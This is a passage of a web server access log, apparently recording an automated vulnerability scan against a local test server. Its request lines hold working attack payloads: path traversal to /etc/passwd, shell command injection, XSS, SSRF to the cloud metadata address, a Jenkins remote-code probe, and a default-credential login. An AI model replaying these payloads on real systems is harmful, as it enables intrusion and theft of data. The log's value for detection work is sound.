"18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0A/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"{\x0D\x0A \x22query\x22: \x22{\x5Cnusers {\x5Cnedges {\x5Cn node {\x5Cn username\x5Cn email\x5Cn avatarUrl\x5Cn status {\x5Cn emoji\x5Cn message\x5Cn messageHtml\x5Cn }\x5Cn }\x5Cn }\x5Cn }\x5Cn }\x22,\x0D\x0A \x22variables\x22: null,\x0D\x0A \x22operationName\x22: null\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /goforms/menu HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"------WebKitFormBoundaryAjZMsILtbrBp8VbC\x0D\x0AContent-Disposition: form-data; name=\x22username\x22\x0D\x0A\x0D\x0Aadmin\x0D\x0A------WebKitFormBoundaryAjZMsILtbrBp8VbC\x0D\x0AContent-Disposition: form-data; name=\x22password\x22\x0D\x0A\x0D\x0Apanabit\x0D\x0A------WebKitFormBoundaryAjZMsILtbrBp8VbC--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/userverify.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/login/login.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /atg/bcc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.override.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"more=0&host=0&username=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=&db=&lang=en_us&expire=3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?action=login.index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /license.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /happyaxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%252f%255cexample.com%252fa%253fb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/CI.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /inizio.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/v1/metadata/private-networks HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.488","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lan.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XmlPeek.aspx?dt=\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5CWindows\x5C\x5Cwin.ini&x=/validate.ashx?requri HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/UI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base_import/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /emswebclient/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-devtools HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /command.cgi?cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /searchblox/servlet/FileServlet?col=9&url=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWebAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/main.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sidekiq HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"29KFpUyTcBDwJ2dp3zAshfbWCJY.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /installer-log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-browser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWebAdmin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /storage/logs/laravel.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/main.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST 